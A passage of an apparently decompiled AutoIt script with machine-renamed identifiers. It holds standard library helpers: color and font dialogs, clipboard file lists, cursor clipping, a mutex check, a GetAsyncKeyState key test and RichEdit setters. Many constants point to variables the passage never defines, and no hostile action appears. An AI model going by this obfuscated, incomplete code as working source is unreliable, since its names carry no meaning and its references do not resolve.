  2902. GLOBAL CONST $Var0460 =NUMBER($Var0461 )
  2903. GLOBAL CONST $Var0462 =NUMBER($Var0463 )
  2904. GLOBAL CONST $Var0464 =NUMBER($Var0465 )
  2905. GLOBAL CONST $Var0466 =NUMBER($Var0467 )
  2906. GLOBAL CONST $Var0468 =NUMBER($Var0469 )
  2907. GLOBAL CONST $Var046A =NUMBER($Var046B )
  2908. GLOBAL CONST $Var046C =NUMBER($Var046D )
  2909. GLOBAL CONST $Var046E =NUMBER($Var046F )
  2910. GLOBAL CONST $Var0470 =NUMBER($Var0471 )
  2911. GLOBAL CONST $Var0472 =NUMBER($Var0473 )
  2912. GLOBAL CONST $Var0474 =NUMBER($Var0475 )
  2913. GLOBAL CONST $Var0476 =NUMBER($Var0477 )
  2914. GLOBAL CONST $Var0478 =NUMBER($Var0479 )
  2915. GLOBAL CONST $Var047A =NUMBER($Var047B )
  2916. GLOBAL CONST $Var047C =NUMBER($Var047D )
  2917. GLOBAL CONST $Var047E =NUMBER($Var047F )
  2918. GLOBAL CONST $Var0480 =NUMBER($Var0481 )
  2919. GLOBAL CONST $Var0482 =NUMBER($Var0483 )
  2920. GLOBAL CONST $Var0484 =NUMBER($Var0485 )
  2921. GLOBAL CONST $Var0486 =NUMBER($Var0487 )
  2922. GLOBAL CONST $Var0488 =NUMBER($Var0489 )
  2923. GLOBAL CONST $Var048A =NUMBER($Var048B )
  2924. GLOBAL CONST $Var048C =NUMBER($Var048D )
  2925. GLOBAL CONST $Var048E =NUMBER($Var048F )
  2926. GLOBAL CONST $Var0490 =NUMBER($Var0491 )
  2927. GLOBAL CONST $Var0492 =NUMBER($Var0493 )
  2928. GLOBAL CONST $Var0494 =NUMBER($Var0495 )
  2929. GLOBAL CONST $Var0496 =NUMBER($Var0497 )
  2930. GLOBAL CONST $Var0498 =$Var0499 &$Var049A
  2931. GLOBAL CONST $Var049B =$Var049C &$Var049D
  2932.  
  2933. Func Fn00FF($ArgOpt00=0,$ArgOpt01=0,$ArgOpt02=0,$ArgOpt03=0)
  2934. LOCAL $Local0079 ="dword[16]"
  2935. LOCAL $Local007A =DLLSTRUCTCREATE($Var0498 )
  2936. LOCAL $Local007B =DLLSTRUCTCREATE($Local0079 )
  2937. IF $ArgOpt02= 1 THEN
  2938. $ArgOpt01=INT($ArgOpt01)
  2939. ELSEIF $ArgOpt02= 2 THEN
  2940. $ArgOpt01=HEX(STRING($ArgOpt01), 6 )
  2941. $ArgOpt01="0x" &STRINGMID($ArgOpt01, 5 , 2 )&STRINGMID($ArgOpt01, 3 , 2 )&STRINGMID($ArgOpt01, 1 , 2 )
  2942. ENDIF
  2943. DLLSTRUCTSETDATA($Local007A ,"Size" ,DLLSTRUCTGETSIZE($Local007A ))
  2944. DLLSTRUCTSETDATA($Local007A ,"hWndOwnder",$ArgOpt03)
  2945. DLLSTRUCTSETDATA($Local007A ,"rgbResult" ,$ArgOpt01)
  2946. DLLSTRUCTSETDATA($Local007A ,"CustColors",DLLSTRUCTGETPTR($Local007B ))
  2947. DLLSTRUCTSETDATA($Local007A ,"Flags" ,BITOR($Var0492 ,$Var0494 ,$Var0496 ))
  2948. LOCAL $Local000E =DLLCALL("comdlg32.dll","bool" ,"ChooseColor","struct*" ,$Local007A )
  2949. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,- 1 )
  2950. IF $Local000E [ 0 ]= 0 THEN RETURN SETERROR(- 3 ,- 3 ,- 1 )
  2951. LOCAL $Local007C =DLLSTRUCTGETDATA($Local007A ,"rgbResult" )
  2952. IF $ArgOpt00= 1 THEN
  2953. RETURN "0x" &HEX(STRING($Local007C ), 6 )
  2954. ELSEIF $ArgOpt00= 2 THEN
  2955. $Local007C =HEX(STRING($Local007C ), 6 )
  2956. RETURN "0x" &STRINGMID($Local007C , 5 , 2 )&STRINGMID($Local007C , 3 , 2 )&STRINGMID($Local007C , 1 , 2 )
  2957. ELSEIF $ArgOpt00= 0 THEN
  2958. RETURN $Local007C
  2959. ELSE
  2960. RETURN SETERROR(- 4 ,- 4 ,- 1 )
  2961. ENDIF
  2962. ENDFUNC
  2963.  
  2964. Func Fn0100($ArgOpt00="Courier New",$ArgOpt01=10,$ArgOpt02=0,$ArgOpt03=0,$ArgOpt04=FALSE ,$ArgOpt05=FALSE ,$ArgOpt06=FALSE ,$ArgOpt07=0)
  2965. LOCAL $Local007D = 0 ,$Var049E = 0 ,$Var049F = 0
  2966. LOCAL $Local007E =Fn0107( 0 )
  2967. LOCAL $Local007F =ROUND(($ArgOpt01*Fn0108($Local007E ,$Var0432 ))/0x0048 , 0 )
  2968. Fn0109( 0 ,$Local007E )
  2969. LOCAL $Local0080 =DLLSTRUCTCREATE($Var049B )
  2970. LOCAL $Local0081 =DLLSTRUCTCREATE($Var04A0 )
  2971. DLLSTRUCTSETDATA($Local0080 ,"Size" ,DLLSTRUCTGETSIZE($Local0080 ))
  2972. DLLSTRUCTSETDATA($Local0080 ,"hWndOwner" ,$ArgOpt07)
  2973. DLLSTRUCTSETDATA($Local0080 ,"LogFont" ,DLLSTRUCTGETPTR($Local0081 ))
  2974. DLLSTRUCTSETDATA($Local0080 ,"PointSize" ,$ArgOpt01)
  2975. DLLSTRUCTSETDATA($Local0080 ,"Flags" ,BITOR($Var042C ,$Var042A ,$Var0428 ,$Var0430 ,$Var042E ))
  2976. DLLSTRUCTSETDATA($Local0080 ,"rgbColors" ,$ArgOpt02)
  2977. DLLSTRUCTSETDATA($Local0080 ,"FontType" , 0 )
  2978. DLLSTRUCTSETDATA($Local0081 ,"Height" ,$Local007F )
  2979. DLLSTRUCTSETDATA($Local0081 ,"Weight" ,$ArgOpt03)
  2980. DLLSTRUCTSETDATA($Local0081 ,"Italic" ,$ArgOpt04)
  2981. DLLSTRUCTSETDATA($Local0081 ,"Underline" ,$ArgOpt05)
  2982. DLLSTRUCTSETDATA($Local0081 ,"Strikeout" ,$ArgOpt06)
  2983. DLLSTRUCTSETDATA($Local0081 ,"FaceName" ,$ArgOpt00)
  2984. LOCAL $Local000E =DLLCALL("comdlg32.dll","bool" ,"ChooseFontW","struct*" ,$Local0080 )
  2985. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,- 1 )
  2986. IF $Local000E [ 0 ]= 0 THEN RETURN SETERROR(- 3 ,- 3 ,- 1 )
  2987. LOCAL $Local0082 =DLLSTRUCTGETDATA($Local0081 ,"FaceName" )
  2988. IF STRINGLEN($Local0082 )= 0 AND STRINGLEN($ArgOpt00)> 0 THEN $Local0082 =$ArgOpt00
  2989. IF DLLSTRUCTGETDATA($Local0081 ,"Italic" )THEN $Local007D = 2
  2990. IF DLLSTRUCTGETDATA($Local0081 ,"Underline" )THEN $Var049E = 4
  2991. IF DLLSTRUCTGETDATA($Local0081 ,"Strikeout" )THEN $Var049F = 8
  2992. LOCAL $Local0083 =BITOR($Local007D ,$Var049E ,$Var049F )
  2993. LOCAL $Local0084 =DLLSTRUCTGETDATA($Local0080 ,"PointSize" )/ 10
  2994. LOCAL $Local0085 =DLLSTRUCTGETDATA($Local0080 ,"rgbColors" )
  2995. LOCAL $Local0086 =DLLSTRUCTGETDATA($Local0081 ,"Weight" )
  2996. LOCAL $Local007C =HEX(STRING($Local0085 ), 6 )
  2997. RETURN STRINGSPLIT($Local0083 &"," &$Local0082 &"," &$Local0084 &"," &$Local0086 &"," &$Local0085 &"," &"0x" &$Local007C &"," &"0x" &STRINGMID($Local007C , 5 , 2 )&STRINGMID($Local007C , 3 , 2 )&STRINGMID($Local007C , 1 , 2 ),"," )
  2998. ENDFUNC
  2999.  
  3000. Func Fn0101($Arg00,$ArgOpt01="|")
  3001. LOCAL CONST $Var016E = 2 ,$Var01DE =0x000F
  3002. $Arg00&=$ArgOpt01&$ArgOpt01
  3003. LOCAL $Local0087 = 2 *(STRINGLEN($Arg00)+0x0014 )
  3004. LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"OpenClipboard","hwnd" , 0 )
  3005. IF @ERROR OR $Local000E [ 0 ]= 0 THEN RETURN SETERROR( 1 ,A1000604D34(),FALSE )
  3006. LOCAL $Local0053 = 0 ,$Local0054 = 0
  3007. $Local000E =DLLCALL("user32.dll","bool" ,"EmptyClipboard")
  3008. IF @ERROR OR NOT $Local000E [ 0 ]THEN
  3009. $Local0053 = 2
  3010. $Local0054 =A1000604D34()
  3011. ELSE
  3012. $Local000E =DLLCALL("kernel32.dll","handle" ,"GlobalAlloc","uint" ,$Var016E ,"ulong_ptr" ,$Local0087 )
  3013. IF @ERROR OR NOT $Local000E [ 0 ]THEN
  3014. $Local0053 = 3
  3015. $Local0054 =A1000604D34()
  3016. ELSE
  3017. LOCAL $Local0088 =$Local000E [ 0 ]
  3018. $Local000E =DLLCALL("kernel32.dll","ptr" ,"GlobalLock","handle" ,$Local0088 )
  3019. IF @ERROR OR NOT $Local000E [ 0 ]THEN
  3020. $Local0053 = 4
  3021. $Local0054 =A1000604D34()
  3022. ELSE
  3023. LOCAL $Local0089 =$Local000E [ 0 ]
  3024. LOCAL $Local008A =DLLSTRUCTCREATE("dword pFiles;"&$Var010E &";bool fNC;bool fWide;wchar["&STRINGLEN($Arg00)+ 1 &"]" ,$Local0089 )
  3025. IF @ERROR THEN RETURN SETERROR( 5 , 6 ,FALSE )
  3026. LOCAL $Local008B =DLLSTRUCTCREATE("dword;long;long;bool;bool")
  3027. DLLSTRUCTSETDATA($Local008A ,"pFiles" ,DLLSTRUCTGETSIZE($Local008B ))
  3028. DLLSTRUCTSETDATA($Local008A ,"X" , 0 )
  3029. DLLSTRUCTSETDATA($Local008A ,"Y" , 0 )
  3030. DLLSTRUCTSETDATA($Local008A ,"fNC" , 0 )
  3031. DLLSTRUCTSETDATA($Local008A ,"fWide" , 1 )
  3032. DLLSTRUCTSETDATA($Local008A , 6 ,$Arg00)
  3033. FOR $Local00EB = 1 TO STRINGLEN($Arg00)
  3034. IF DLLSTRUCTGETDATA($Local008A , 6 ,$Local00EB )=$ArgOpt01 THEN DLLSTRUCTSETDATA($Local008A , 6 ,CHR( 0 ),$Local00EB )
  3035. NEXT
  3036. $Local000E =DLLCALL("user32.dll","handle" ,"SetClipboardData","uint" ,$Var01DE ,"handle" ,$Local0088 )
  3037. IF @ERROR OR NOT $Local000E [ 0 ]THEN
  3038. $Local0053 = 6
  3039. $Local0054 =A1000604D34()
  3040. ENDIF
  3041. $Local000E =DLLCALL("kernel32.dll","bool" ,"GlobalUnlock","handle" ,$Local0088 )
  3042. IF (@ERROR OR NOT $Local000E [ 0 ])AND NOT $Local0053 AND A1000604D34()THEN
  3043. $Local0053 = 8
  3044. $Local0054 =A1000604D34()
  3045. ENDIF
  3046. ENDIF
  3047. $Local000E =DLLCALL("kernel32.dll","ptr" ,"GlobalFree","handle" ,$Local0088 )
  3048. IF (@ERROR OR $Local000E [ 0 ])AND NOT $Local0053 THEN
  3049. $Local0053 = 9
  3050. $Local0054 =A1000604D34()
  3051. ENDIF
  3052. ENDIF
  3053. ENDIF
  3054. $Local000E =DLLCALL("user32.dll","bool" ,"CloseClipboard")
  3055. IF (@ERROR OR NOT $Local000E [ 0 ])AND NOT $Local0053 THEN RETURN SETERROR( 7 ,A1000604D34(),FALSE )
  3056. IF $Local0053 THEN RETURN SETERROR($Local0053 ,$Local0054 ,FALSE )
  3057. RETURN TRUE
  3058. ENDFUNC
  3059.  
  3060. Func Fn0102($Arg00,$Arg01,$Arg02)
  3061. IF $Arg00 THEN
  3062. RETURN $Arg01
  3063. ELSE
  3064. RETURN $Arg02
  3065. ENDIF
  3066. ENDFUNC
  3067.  
  3068. Func Fn0103($ArgOpt00=0,$ArgOpt01=0,$ArgOpt02=0,$ArgOpt03=0)
  3069. LOCAL $Local000E
  3070. IF @NumParams == 0 THEN
  3071. $Local000E =DLLCALL("user32.dll","bool" ,"ClipCursor","ptr" , 0 )
  3072. IF @ERROR OR NOT $Local000E [ 0 ]THEN RETURN SETERROR( 1 ,A1000604D34(),FALSE )
  3073. ELSE
  3074. IF @NumParams == 2 THEN
  3075. $ArgOpt02=$ArgOpt00+ 1
  3076. $ArgOpt03=$ArgOpt01+ 1
  3077. ENDIF
  3078. LOCAL $Local0017 =DLLSTRUCTCREATE($Var013C )
  3079. DLLSTRUCTSETDATA($Local0017 ,"Left" ,$ArgOpt00)
  3080. DLLSTRUCTSETDATA($Local0017 ,"Top" ,$ArgOpt01)
  3081. DLLSTRUCTSETDATA($Local0017 ,"Right" ,$ArgOpt02)
  3082. DLLSTRUCTSETDATA($Local0017 ,"Bottom" ,$ArgOpt03)
  3083. $Local000E =DLLCALL("user32.dll","bool" ,"ClipCursor","struct*" ,$Local0017 )
  3084. IF @ERROR OR NOT $Local000E [ 0 ]THEN RETURN SETERROR( 2 ,A1000604D34(),FALSE )
  3085. ENDIF
  3086. RETURN TRUE
  3087. ENDFUNC
  3088.  
  3089. Func Fn0104($Arg00,$ArgOpt01=0)
  3090. LOCAL CONST $Var04A1 =0x00B7
  3091. LOCAL CONST $Var04A2 = 1
  3092. LOCAL $Local008C = 0
  3093. IF BITAND($ArgOpt01, 2 )THEN
  3094. LOCAL $Local008D =DLLSTRUCTCREATE("byte;byte;word;ptr[4]")
  3095. LOCAL $Local008E =DLLCALL("advapi32.dll","bool" ,"InitializeSecurityDescriptor","struct*" ,$Local008D ,"dword" ,$Var04A2 )
  3096. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  3097. IF $Local008E [ 0 ]THEN
  3098. $Local008E =DLLCALL("advapi32.dll","bool" ,"SetSecurityDescriptorDacl","struct*" ,$Local008D ,"bool" , 1 ,"ptr" , 0 ,"bool" , 0 )
  3099. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  3100. IF $Local008E [ 0 ]THEN
  3101. $Local008C =DLLSTRUCTCREATE($Var04A3 )
  3102. DLLSTRUCTSETDATA($Local008C , 1 ,DLLSTRUCTGETSIZE($Local008C ))
  3103. DLLSTRUCTSETDATA($Local008C , 2 ,DLLSTRUCTGETPTR($Local008D ))
  3104. DLLSTRUCTSETDATA($Local008C , 3 , 0 )
  3105. ENDIF
  3106. ENDIF
  3107. ENDIF
  3108. LOCAL $Local008F =DLLCALL("kernel32.dll","handle" ,"CreateMutexW","struct*" ,$Local008C ,"bool" , 1 ,"wstr" ,$Arg00)
  3109. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  3110. LOCAL $Local0090 =DLLCALL("kernel32.dll","dword" ,"GetLastError")
  3111. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  3112. IF $Local0090 [ 0 ]=$Var04A1 THEN
  3113. IF BITAND($ArgOpt01, 1 )THEN
  3114. RETURN SETERROR($Local0090 [ 0 ],$Local0090 [ 0 ], 0 )
  3115. ELSE
  3116. EXIT - 1
  3117. ENDIF
  3118. ENDIF
  3119. RETURN $Local008F [ 0 ]
  3120. ENDFUNC
  3121.  
  3122. Func Fn0105($Arg00,$ArgOpt01="user32.dll")
  3123. LOCAL $Local0091 =DLLCALL($ArgOpt01,"short" ,"GetAsyncKeyState","int" ,"0x" &$Arg00)
  3124. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  3125. RETURN BITAND($Local0091 [ 0 ],0x8000 )<> 0
  3126. ENDFUNC
  3127.  
  3128. Func Fn0106($Arg00,$Arg01)
  3129. IF $Arg00=$Arg01 THEN RETURN 0
  3130. LOCAL $Local0092 ="."
  3131. IF STRINGINSTR($Arg00,$Local0092 )= 0 THEN $Local0092 =","
  3132. LOCAL $Local0093 =STRINGSPLIT($Arg00,$Local0092 )
  3133. LOCAL $Local0094 =STRINGSPLIT($Arg01,$Local0092 )
  3134. IF UBOUND($Local0093 )<>UBOUND($Local0094 )OR UBOUND($Local0093 )= 0 THEN
  3135. SETEXTENDED( 1 )
  3136. IF $Arg00>$Arg01 THEN
  3137. RETURN 1
  3138. ELSEIF $Arg00<$Arg01 THEN
  3139. RETURN - 1
  3140. ENDIF
  3141. ELSE
  3142. FOR $Local00EB = 1 TO UBOUND($Local0093 )- 1
  3143. IF STRINGISDIGIT($Local0093 [$Local00EB ])AND STRINGISDIGIT($Local0094 [$Local00EB ])THEN
  3144. IF NUMBER($Local0093 [$Local00EB ])>NUMBER($Local0094 [$Local00EB ])THEN
  3145. RETURN 1
  3146. ELSEIF NUMBER($Local0093 [$Local00EB ])<NUMBER($Local0094 [$Local00EB ])THEN
  3147. RETURN - 1
  3148. ENDIF
  3149. ELSE
  3150. SETEXTENDED( 1 )
  3151. IF $Local0093 [$Local00EB ]>$Local0094 [$Local00EB ]THEN
  3152. RETURN 1
  3153. ELSEIF $Local0093 [$Local00EB ]<$Local0094 [$Local00EB ]THEN
  3154. RETURN - 1
  3155. ENDIF
  3156. ENDIF
  3157. NEXT
  3158. ENDIF
  3159. RETURN SETERROR( 2 , 0 , 0 )
  3160. ENDFUNC
  3161.  
  3162. Func Fn0107($Arg00)
  3163. LOCAL $Local000E =DLLCALL("User32.dll","handle" ,"GetDC" ,"hwnd" ,$Arg00)
  3164. IF @ERROR OR NOT $Local000E [ 0 ]THEN RETURN SETERROR( 1 ,A1000604D34(), 0 )
  3165. RETURN $Local000E [ 0 ]
  3166. ENDFUNC
  3167.  
  3168. Func Fn0108($Arg00,$Arg01)
  3169. LOCAL $Local000E =DLLCALL("GDI32.dll" ,"int" ,"GetDeviceCaps","handle" ,$Arg00,"int" ,$Arg01)
  3170. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  3171. RETURN $Local000E [ 0 ]
  3172. ENDFUNC
  3173.  
  3174. Func Fn0109($Arg00,$Arg01)
  3175. LOCAL $Local000E =DLLCALL("User32.dll","int" ,"ReleaseDC" ,"hwnd" ,$Arg00,"handle" ,$Arg01)
  3176. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  3177. RETURN $Local000E [ 0 ]<> 0
  3178. ENDFUNC
  3179. GLOBAL CONST $Var04A4 =NUMBER($Var04A5 )
  3180. GLOBAL CONST $Var04A6 =NUMBER($Var04A7 )
  3181. GLOBAL CONST $Var04A8 =NUMBER($Var04A9 )
  3182. GLOBAL CONST $Var04AA =NUMBER($Var04AB )
  3183. GLOBAL CONST $Var04AC =NUMBER($Var04AD )
  3184. GLOBAL CONST $Var04AE =NUMBER($Var04AF )
  3185. GLOBAL $Var04B0 [$Var04A6 ][$Var04AA +$Var04A4 +NUMBER($Var04B1 )]
  3186.  
  3187. Func Fn010A($Arg00)
  3188. LOCAL $Local0097 ,$Var04B2 =- 1 ,$Var04B3 =TRUE
  3189. IF NOT WINEXISTS($Arg00)THEN RETURN SETERROR(- 1 ,- 1 , 0 )
  3190. FOR $Local0066 = 0 TO $Var04A6 - 1
  3191. IF $Var04B0 [$Local0066 ][ 0 ]<> 0 THEN
  3192. IF NOT WINEXISTS($Var04B0 [$Local0066 ][ 0 ])THEN
  3193. FOR $Var0149 = 0 TO UBOUND($Var04B0 , 2 )- 1
  3194. $Var04B0 [$Local0066 ][$Var0149 ]= 0
  3195. NEXT
  3196. $Var04B0 [$Local0066 ][ 1 ]=$Var04A8
  3197. $Var04B3 =FALSE
  3198. ENDIF
  3199. ENDIF
  3200. NEXT
  3201. FOR $Local0066 = 0 TO $Var04A6 - 1
  3202. IF $Var04B0 [$Local0066 ][ 0 ]=$Arg00 THEN
  3203. $Var04B2 =$Local0066
  3204. EXITLOOP
  3205. ENDIF
  3206. NEXT
  3207. IF $Var04B2 =- 1 THEN
  3208. FOR $Local0066 = 0 TO $Var04A6 - 1
  3209. IF $Var04B0 [$Local0066 ][ 0 ]= 0 THEN
  3210. $Var04B0 [$Local0066 ][ 0 ]=$Arg00
  3211. $Var04B0 [$Local0066 ][ 1 ]=$Var04A8
  3212. $Var04B3 =FALSE
  3213. $Var04B2 =$Local0066
  3214. EXITLOOP
  3215. ENDIF
  3216. NEXT
  3217. ENDIF
  3218. IF $Var04B2 =- 1 AND $Var04B3 THEN RETURN SETERROR(0x0010 , 0 , 0 )
  3219. IF $Var04B0 [$Var04B2 ][ 1 ]=$Var04A8 +$Var04AA THEN
  3220. FOR $Var04B4 =$Var04A4 TO UBOUND($Var04B0 , 2 )- 1
  3221. IF $Var04B0 [$Var04B2 ][$Var04B4 ]= 0 THEN
  3222. $Local0097 =($Var04B4 -$Var04A4 )+0x2710
  3223. $Var04B0 [$Var04B2 ][$Var04B4 ]=$Local0097
  3224. RETURN $Local0097
  3225. ENDIF
  3226. NEXT
  3227. RETURN SETERROR(- 1 ,$Var04AA , 0 )
  3228. ENDIF
  3229. $Local0097 =$Var04B0 [$Var04B2 ][ 1 ]
  3230. $Var04B0 [$Var04B2 ][ 1 ]+= 1
  3231. $Var04B0 [$Var04B2 ][($Local0097 -0x2710 )+$Var04A4 ]=$Local0097
  3232. RETURN $Local0097
  3233. ENDFUNC
  3234.  
  3235. Func Fn010B($Arg00,$Arg01)
  3236. IF $Arg01-$Var04A8 < 0 OR $Arg01-$Var04A8 >$Var04AA THEN RETURN SETERROR(- 1 , 0 ,FALSE )
  3237. FOR $Local0066 = 0 TO $Var04A6 - 1
  3238. IF $Var04B0 [$Local0066 ][ 0 ]=$Arg00 THEN
  3239. FOR $Var0149 =$Var04A4 TO UBOUND($Var04B0 , 2 )- 1
  3240. IF $Var04B0 [$Local0066 ][$Var0149 ]=$Arg01 THEN
  3241. $Var04B0 [$Local0066 ][$Var0149 ]= 0
  3242. RETURN TRUE
  3243. ENDIF
  3244. NEXT
  3245. RETURN SETERROR(- 3 , 0 ,FALSE )
  3246. ENDIF
  3247. NEXT
  3248. RETURN SETERROR(- 2 , 0 ,FALSE )
  3249. ENDFUNC
  3250.  
  3251. Func Fn010C($Arg00,$ArgOpt01=@SCRIPTLINENUMBER,$ArgOpt02=@ERROR,$ArgOpt03=@EXTENDED)
  3252. CONSOLEWRITE("!==========================================================="& @CRLF &"+======================================================"& @CRLF &"-->Line(" &STRINGFORMAT("%04d" ,$ArgOpt01)&"):" & @TAB &$Arg00& @CRLF &"+======================================================"& @CRLF )
  3253. RETURN SETERROR($ArgOpt02,$ArgOpt03, 1 )
  3254. ENDFUNC
  3255.  
  3256. Func Fn010D($Arg00,$Arg01)
  3257. Fn010C("This is for debugging only, set the debug variable to false before submitting")
  3258. IF Fn007D($Arg00,$Arg01)THEN RETURN TRUE
  3259. LOCAL $Local0048 =OPT("GUIDataSeparatorChar")
  3260. $Arg01=STRINGREPLACE($Arg01,$Local0048 ,"," )
  3261. Fn010C("Invalid Class Type(s):"& @LF & @TAB &"Expecting Type(s): "&$Arg01& @LF & @TAB &"Received Type : "&Fn0045($Arg00))
  3262. EXIT
  3263. ENDFUNC
  3264. GLOBAL $Var04B5 =FALSE
  3265. GLOBAL $Var04B6 ,$Var04B7 ,$Var04B8 ,$Var04B9 =NUMBER($Var04BA )
  3266. GLOBAL $Var04BB ,$Var04BC ,$Var04BD
  3267. GLOBAL $Var04BE =DLLCALLBACKREGISTER("Fn0171",$Var04BF ,$Var04C0 )
  3268. GLOBAL $Var04C1 =DLLCALLBACKREGISTER("Fn0172",$Var04C2 ,$Var04C3 )
  3269. GLOBAL $Var04C4 =DLLCALLBACKREGISTER("Fn0173",$Var04C5 ,$Var04C6 )
  3270. GLOBAL $Var04C7 =DLLCALLBACKREGISTER("Fn0174",$Var04C8 ,$Var04C9 )
  3271. GLOBAL $Var04CA
  3272. GLOBAL $Var04CB
  3273. GLOBAL $Var04CC =DLLSTRUCTCREATE($Var04CD )
  3274. GLOBAL $Var04CE ,$Var04CF
  3275. GLOBAL $Var04D0 =DLLOPEN($Var04D1 )
  3276. GLOBAL $Var04D2 =DLLCALLBACKREGISTER("Fn017D",$Var04D3 ,$Var04D4 )
  3277. GLOBAL $Var04D5 =DLLCALLBACKREGISTER("Fn017E",$Var04D6 ,$Var04D7 )
  3278. GLOBAL $Var04D8 =DLLCALLBACKREGISTER("Fn017F",$Var04D9 ,$Var04DA )
  3279. GLOBAL $Var04DB =DLLCALLBACKREGISTER("Fn0189",$Var04DC ,$Var04DD )
  3280. GLOBAL $Var04DE =DLLCALLBACKREGISTER("Fn0180",$Var04DF ,$Var04E0 )
  3281. GLOBAL $Var04E1 =DLLCALLBACKREGISTER("Fn0181",$Var04E2 ,$Var04E3 )
  3282. GLOBAL $Var04E4 =DLLCALLBACKREGISTER("Fn0182",$Var04E5 ,$Var04E6 )
  3283. GLOBAL $Var04E7 =DLLCALLBACKREGISTER("Fn0183",$Var04E8 ,$Var04E9 )
  3284. GLOBAL $Var04EA =DLLCALLBACKREGISTER("Fn0184",$Var04EB ,$Var04EC )
  3285. GLOBAL $Var04ED =DLLCALLBACKREGISTER("Fn0185",$Var04EE ,$Var04EF )
  3286. GLOBAL $Var04F0 =DLLCALLBACKREGISTER("Fn0186",$Var04F1 ,$Var04F2 )
  3287. GLOBAL $Var04F3 =DLLCALLBACKREGISTER("Fn0187",$Var04F4 ,$Var04F5 )
  3288. GLOBAL $Var04F6 =DLLCALLBACKREGISTER("Fn0188",$Var04F7 ,$Var04F8 )
  3289. GLOBAL CONST $Var04F9 =NUMBER($Var04FA )
  3290. GLOBAL CONST $Var04FB =NUMBER($Var04FC )
  3291. GLOBAL CONST $Var04FD =NUMBER($Var04FE )
  3292. GLOBAL CONST $Var04FF =NUMBER($Var0500 )
  3293. GLOBAL CONST $Var0501 =NUMBER($Var0502 )
  3294. GLOBAL CONST $Var0503 =NUMBER($Var0504 )
  3295. GLOBAL CONST $Var0505 =NUMBER($Var0506 )
  3296. GLOBAL CONST $Var0507 =NUMBER($Var0508 )
  3297. GLOBAL CONST $Var0509 =NUMBER($Var050A )
  3298. GLOBAL CONST $Var050B =NUMBER($Var050C )
  3299. GLOBAL CONST $Var050D =NUMBER($Var050E )
  3300. GLOBAL CONST $Var050F =NUMBER($Var0510 )
  3301. GLOBAL CONST $Var0511 =NUMBER($Var0512 )
  3302. GLOBAL CONST $Var0513 =NUMBER($Var0514 )
  3303. GLOBAL CONST $Var0515 =NUMBER($Var0516 )
  3304. GLOBAL CONST $Var0517 =NUMBER($Var0518 )
  3305. GLOBAL CONST $Var0519 =$Var051A
  3306. GLOBAL CONST $Var051B =$Var051C
  3307. GLOBAL CONST $Var051D =$Var051E &$Var051F
  3308. GLOBAL CONST $Var0520 =$Var051D &$Var0521 &$Var0522
  3309. GLOBAL CONST $Var0523 =$Var0524
  3310. GLOBAL CONST $Var0525 =$Var0523 &$Var0526
  3311. GLOBAL CONST $Var0527 =$Var0523 &$Var0528
  3312. GLOBAL CONST $Var0529 =$Var052A
  3313. GLOBAL CONST $Var052B =$Var052C
  3314. GLOBAL CONST $Var052D =$Var052E &$Var052F
  3315. GLOBAL CONST $Var0530 =$Var052D &$Var0531 &$Var0532 &$Var0533
  3316. GLOBAL CONST $Var0534 =$Var0535
  3317. GLOBAL CONST $Var0536 =$Var0523 &$Var0537
  3318. GLOBAL CONST $Var0538 =$Var0539 &$Var053A &$Var053B
  3319. GLOBAL CONST $Var053C =$Var053D &$Var053A &$Var053E &$Var0523
  3320.  
  3321. Func Fn010E($Arg00,$Arg01)
  3322. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  3323. LOCAL $Local0095 =Fn0126($Arg00)
  3324. Fn0167($Arg00,$Local0095 ,$Local0095 )
  3325. LOCAL $Local0096 =DLLSTRUCTCREATE($Var0534 )
  3326. DLLSTRUCTSETDATA($Local0096 , 1 ,$Var02E2 )
  3327. LOCAL $Local0055
  3328. IF STRINGLEFT($Arg01, 5 )<>"{\rtf" AND STRINGLEFT($Arg01, 5 )<>"{urtf" THEN
  3329. DLLSTRUCTSETDATA($Local0096 , 2 ,$Var0302 )
  3330. $Local0055 =Fn0006($Arg00,$Var0274 ,$Local0096 ,$Arg01, 0 ,"struct*" ,"wstr" )
  3331. ELSE
  3332. DLLSTRUCTSETDATA($Local0096 , 2 ,$Var0300 )
  3333. $Local0055 =Fn0006($Arg00,$Var0274 ,$Local0096 ,$Arg01, 0 ,"struct*" ,"STR" )
  3334. ENDIF
  3335. IF NOT $Local0055 THEN RETURN SETERROR(0x02BC , 0 ,FALSE )
  3336. RETURN TRUE
  3337. ENDFUNC
  3338.  
  3339. Func Fn010F($Arg00,$Arg01)
  3340. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  3341. IF NOT ISBOOL($Arg01)THEN RETURN SETERROR(0x0066 , 0 ,FALSE )
  3342. IF Fn0006($Arg00,$Var01F8 ,$Arg01)THEN RETURN SETERROR(0x02BC , 0 ,FALSE )
  3343. RETURN TRUE
  3344. ENDFUNC
  3345.  
  3346. Func Fn0110($Arg00)
  3347. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  3348. LOCAL $Local0055 =Fn0006($Arg00,$Var01FA , 0 , 0 )
  3349. RETURN $Local0055 <> 0
  3350. ENDFUNC
  3351.  
  3352. Func Fn0111($Arg00)
  3353. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  3354. RETURN Fn0006($Arg00,$Var01FA ,$Var04BC , 0 )<> 0 AND Fn0006($Arg00,$Var01FA ,$Var04BD , 0 )<> 0
  3355. ENDFUNC
  3356.  
  3357. Func Fn0112($Arg00)
  3358. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  3359. RETURN Fn0006($Arg00,$Var01FC , 0 , 0 )<> 0
  3360. ENDFUNC
  3361.  
  3362. Func Fn0113($Arg00)
